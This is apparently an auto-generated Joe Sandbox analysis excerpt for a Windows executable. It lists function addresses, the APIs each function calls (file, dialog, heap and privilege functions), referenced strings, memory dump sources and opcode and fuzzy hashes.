Opcode Fuzzy Hash: 21079e0b07ac6ac13b1efb3e694a6ae9fc15d94165a90d399f4b9b68c1711a0c
Instruction Fuzzy Hash: BC11E8A7D0860783FB10AB00A9813742394AF4438CF640435C50CC76A1DE7FB9A5971A

Function 00007FF6EF6BDC28 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6BDDB0: FindFirstFileW.KERNELBASE(?,?,?,?,?,00007FF6EF6BDC57), ref: 00007FF6EF6BDDFA
Part of subcall function 00007FF6EF6BDDB0: FindFirstFileW.KERNEL32 ref: 00007FF6EF6BDE2B
Part of subcall function 00007FF6EF6BDDB0: GetLastError.KERNEL32 ref: 00007FF6EF6BDE3A

FindClose.KERNELBASE ref: 00007FF6EF6BDC60

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 9045ae54a1564c21f2e510cde9f4d833ceb3cbc7bccef2113bc42fea38d961fa
Instruction ID: 90984ddc59c91eaf3515bca784213714f541d40070434ed553e980757cf47b03
Opcode Fuzzy Hash: 9045ae54a1564c21f2e510cde9f4d833ceb3cbc7bccef2113bc42fea38d961fa
Instruction Fuzzy Hash: 80F0812390C6C147EB119E7591443F827659B05BB8F084734EABC4F2CBCE9E9089972A

Function 00007FF6EF6BCB58 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE ref: 00007FF6EF6BCB71

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: 843bb97532330659db1f64e266b982f4e5cdcb856968631ea0d8171677117ef8
Instruction ID: 676cfff2675216450b8c496b5fa35dc659d0627b9da35b0158b7abb528d2230f
Opcode Fuzzy Hash: 843bb97532330659db1f64e266b982f4e5cdcb856968631ea0d8171677117ef8
Instruction Fuzzy Hash: 0AE0CD13B1052543EB149B36CC417381324EF8DF84F441030DE0D87365CF1AD591C609

Function 00007FF6EF6E1A20 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

__vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF6EF6E1A4B

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: __vcrt_uninitialize_ptd
String ID:
API String ID: 1180542099-0
Opcode ID: 8ef332255f6b8c6c4f741829608c0e63700b8186080fd5d381217a6fa3415887
Instruction ID: 1ff3f63248a7afdd9e24908f078707c8b11cdffd759d3f452bec143369dbd888
Opcode Fuzzy Hash: 8ef332255f6b8c6c4f741829608c0e63700b8186080fd5d381217a6fa3415887
Instruction Fuzzy Hash: 18E0B653F1D20683ED54AB284D423B813682F14310F901536D01EC21D2ED1F7746761B

Function 00007FF6EF6D507C Relevance: 1.5, APIs: 1, Instructions: 12windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32 ref: 00007FF6EF6D50A6

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ItemMessageSend
String ID:
API String ID: 3015471070-0
Opcode ID: 1b7d7cadcd6623d218b54f6ffec4c470525b694835c4cdf97ebde3ad9db0cc9f
Instruction ID: 06acebf14b955a9198b69737ac18ec78c9f3ca00e8507e6dbd9deb52625a8641
Opcode Fuzzy Hash: 1b7d7cadcd6623d218b54f6ffec4c470525b694835c4cdf97ebde3ad9db0cc9f
Instruction Fuzzy Hash: 74D0A796F1928683FB10A301B4193390311BF52B80F504230C94D5F791CE3FD1328B4A

Function 00007FF6EF6BC95C Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE ref: 00007FF6EF6BC96E

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: ebe3dc7161292714e69aba335fc43f49376bb13a634a5a82b6ea72084c8ac808
Instruction ID: bc7f5d16cc4919fba41b541d4b241b6dde775d46d889be5692007515f8fc9845
Opcode Fuzzy Hash: ebe3dc7161292714e69aba335fc43f49376bb13a634a5a82b6ea72084c8ac808
Instruction Fuzzy Hash: E7D0C91390A84293E9146735985123C2354AF42B35FA40B31E27ED16E2CF1EA696B21A

Function 00007FF6EF6D122C Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE ref: 00007FF6EF6D1230

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: c610d1a9c67004ed5c02865e722ec5e3a38e9a735714e81327301ce1d77fe7a9
Instruction ID: 69528e321349182506f8403df6c937a8119ea7ab7467acb08a62258981971fba
Opcode Fuzzy Hash: c610d1a9c67004ed5c02865e722ec5e3a38e9a735714e81327301ce1d77fe7a9
Instruction Fuzzy Hash: BEA01102F02002C3AA082BB20C8220803283B88B00F808020C008C02A0CE0CA2AAAB02

Function 00007FF6EF6E3EB4 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF6EF6E3F09

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 8b06ee4b06dc0b91c0a18f8228158a153803d49962856f9214b9ee8b30576176
Instruction ID: c5a5f96a4c9e988b77a082665190bab730ac7a19a5266f1aa5103874a7724685
Opcode Fuzzy Hash: 8b06ee4b06dc0b91c0a18f8228158a153803d49962856f9214b9ee8b30576176
Instruction Fuzzy Hash: 86F06257B0960387FE5456626D123F517A85F98B80F5C4431CD0EC72E2DE2EE684A21A

Function 00007FF6EF6BC620 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FF6EF6BC5D9), ref: 00007FF6EF6BC648

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 760b79e1028f6c46a4e72fb90bb68dc594781e66e65f09b218abdfffe4dfe5ea
Instruction ID: 4b4754d4ca0927a620f5313b05b91abd200346d6130be3e00b1e485628376e80
Opcode Fuzzy Hash: 760b79e1028f6c46a4e72fb90bb68dc594781e66e65f09b218abdfffe4dfe5ea
Instruction Fuzzy Hash: B1F0FF23A0824247FF618B24E0407782324DB04B78F682730E73C811CDDF3ADA9AE74A

Function 00007FF6EF6E1C94 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF6EF6E1CD2

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c65caaf763c3ab33a1535183b9383c6055f8091b4164183f1201565ffa92954d
Instruction ID: 0f8deae90b34e609a9eb71158e4c198974ca9cc292aef22c4be702ad930c69ae
Opcode Fuzzy Hash: c65caaf763c3ab33a1535183b9383c6055f8091b4164183f1201565ffa92954d
Instruction Fuzzy Hash: 00F08213B8C20683FE5467625D013B413B96F88FA4F284630DC2EC63C1DE2EEA41B61B

Non-executed Functions

Function 00007FF6EF6D3000 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6B13D0: GetDlgItem.USER32 ref: 00007FF6EF6B1420
Part of subcall function 00007FF6EF6B13D0: SetWindowTextW.USER32 ref: 00007FF6EF6B143C

SendDlgItemMessageW.USER32 ref: 00007FF6EF6D30BB
EndDialog.USER32 ref: 00007FF6EF6D30D5

Strings

REPLACEFILEDLG, xrefs: 00007FF6EF6D3032
%s %s, xrefs: 00007FF6EF6D31DD

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Item$DialogMessageSendTextWindow
String ID: %s %s$REPLACEFILEDLG
API String ID: 1217692187-439456425
Opcode ID: 22531550e0a1cf0bd19cd76bd62179b0479e59159f3dbb295e98913310aec2fe
Instruction ID: 4cdf4272b77718f9c37f015b9b5b990024291eec17094074dd5b8e07ed12b222
Opcode Fuzzy Hash: 22531550e0a1cf0bd19cd76bd62179b0479e59159f3dbb295e98913310aec2fe
Instruction Fuzzy Hash: 5B91C86770868287FB20AF21E8553F92355FB84B88F504135DA0D8BB9ADF3FD605970A

Function 00007FF6EF6B903C Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 317fileCOMMON

Download Yara Rule

APIs

wcscpy.LIBCMT ref: 00007FF6EF6B9174
CreateFileW.KERNEL32 ref: 00007FF6EF6B9253

Part of subcall function 00007FF6EF6B9F5C: GetCurrentProcess.KERNEL32 ref: 00007FF6EF6B9F7F
Part of subcall function 00007FF6EF6B9F5C: OpenProcessToken.ADVAPI32 ref: 00007FF6EF6B9F90
Part of subcall function 00007FF6EF6B9F5C: GetLastError.KERNEL32 ref: 00007FF6EF6B9FE0
Part of subcall function 00007FF6EF6B9F5C: CloseHandle.KERNEL32 ref: 00007FF6EF6B9FF3

Part of subcall function 00007FF6EF6BD408: DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00007FF6EF6BC5D2), ref: 00007FF6EF6BD430
Part of subcall function 00007FF6EF6BD408: DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6BC5D2), ref: 00007FF6EF6BD45B

CloseHandle.KERNEL32 ref: 00007FF6EF6B9276
wcscpy.LIBCMT ref: 00007FF6EF6B92C5
wcscpy.LIBCMT ref: 00007FF6EF6B92EE
wcscpy.LIBCMT ref: 00007FF6EF6B9366
wcscpy.LIBCMT ref: 00007FF6EF6B938F
CreateFileW.KERNEL32 ref: 00007FF6EF6B93C5
DeviceIoControl.KERNEL32 ref: 00007FF6EF6B9426
CloseHandle.KERNEL32 ref: 00007FF6EF6B9437
GetLastError.KERNEL32 ref: 00007FF6EF6B9456
RemoveDirectoryW.KERNEL32 ref: 00007FF6EF6B94A4
DeleteFileW.KERNEL32 ref: 00007FF6EF6B94AF

Strings

\??\, xrefs: 00007FF6EF6B910A
SeRestorePrivilege, xrefs: 00007FF6EF6B908E
SeCreateSymbolicLinkPrivilege, xrefs: 00007FF6EF6B909A
UNC\, xrefs: 00007FF6EF6B9144

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Filewcscpy$CloseDeleteHandle$CreateErrorLastProcess$ControlCurrentDeviceDirectoryOpenRemoveToken
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3201109463-3508440684
Opcode ID: 0492517c559859d46da067de4b96b3a0353f50bb79d0686b4473a232aa762f12
Instruction ID: 0ba5595be3f98ea29869578bd94c2a2d6fb99840b50aad557dab98836b2bdd1c
Opcode Fuzzy Hash: 0492517c559859d46da067de4b96b3a0353f50bb79d0686b4473a232aa762f12
Instruction Fuzzy Hash: 54E18423A0868287EB20DB20E8507FD6368FF41784F504531EA9DC769AEF3EE505D70A

Function 00007FF6EF6E6760 Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6EF6E67A9
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E6E22
memcpy_s.LIBCMT ref: 00007FF6EF6E77CF
memcpy_s.LIBCMT ref: 00007FF6EF6E7876

Part of subcall function 00007FF6EF6E7ACC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E7AFE

memcpy_s.LIBCMT ref: 00007FF6EF6E793F

Part of subcall function 00007FF6EF6E1500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E1525

Strings

1#INF, xrefs: 00007FF6EF6E7A17
1#SNAN, xrefs: 00007FF6EF6E79D9
1#IND, xrefs: 00007FF6EF6E79BA
1#QNAN, xrefs: 00007FF6EF6E79F8

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 281475176-2761157908
Opcode ID: f068c9ac5b184d3e8060cf8fcbfca69774e69d4a752ab7d3af02b0ffdf29b8f8
Instruction ID: 83473d7d92e7ba59c548f7e1c05b514ba61e1e7b34e73b987d384fe0fdc02759
Opcode Fuzzy Hash: f068c9ac5b184d3e8060cf8fcbfca69774e69d4a752ab7d3af02b0ffdf29b8f8
Instruction Fuzzy Hash: 79B21973E182828BE7258E69DC407FD37A9FB4438CF505135DA1A9BB84DF3AE6049B05

Function 00007FF6EF6B2E60 Relevance: 14.7, APIs: 5, Strings: 3, Instructions: 655COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6B3391
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6EF6B36FF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6EF6B3705

Strings

xc%u, xrefs: 00007FF6EF6B35AD
;%u, xrefs: 00007FF6EF6B3381
x%u, xrefs: 00007FF6EF6B354D

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$swprintf
String ID: ;%u$x%u$xc%u
API String ID: 449872665-2277559157
Opcode ID: 6a17a56be1e43b4ccab18cc4b6a8258449a75d3b64fbcb6a86b421c5decf75c4
Instruction ID: 614e9f1eedb2777d28c97b00685a8211e187b5d9af51c3ad1baa8824ccbb48fd
Opcode Fuzzy Hash: 6a17a56be1e43b4ccab18cc4b6a8258449a75d3b64fbcb6a86b421c5decf75c4
Instruction Fuzzy Hash: 8342C223B1868253EE14DB2591463FE6359AF45784F404831EB8ECB79ADF7EE044E70A

Function 00007FF6EF6D7388 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6EF6D73A4
RtlCaptureContext.KERNEL32 ref: 00007FF6EF6D73D1
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6EF6D73EB
RtlVirtualUnwind.KERNEL32 ref: 00007FF6EF6D742C
IsDebuggerPresent.KERNEL32 ref: 00007FF6EF6D7480
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6EF6D74A1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6EF6D74AC

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1cccea8635c3508c15296068c359dbd06a7f7fdb47bc52dff3748f3d4d690920
Instruction ID: d2e65683a8427ddf192d93ed68efc12817e4100a8e3d92e57913556156d450f8
Opcode Fuzzy Hash: 1cccea8635c3508c15296068c359dbd06a7f7fdb47bc52dff3748f3d4d690920
Instruction Fuzzy Hash: C1316F73609B8187EB609F60E8407ED3364FB94744F84443ADA4E87A88DF39D648CB15

Function 00007FF6EF6DBB94 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6EF6DBC0D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6EF6DBC25
RtlVirtualUnwind.KERNEL32 ref: 00007FF6EF6DBC60
IsDebuggerPresent.KERNEL32 ref: 00007FF6EF6DBC99
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6EF6DBCA3
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6EF6DBCAE

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
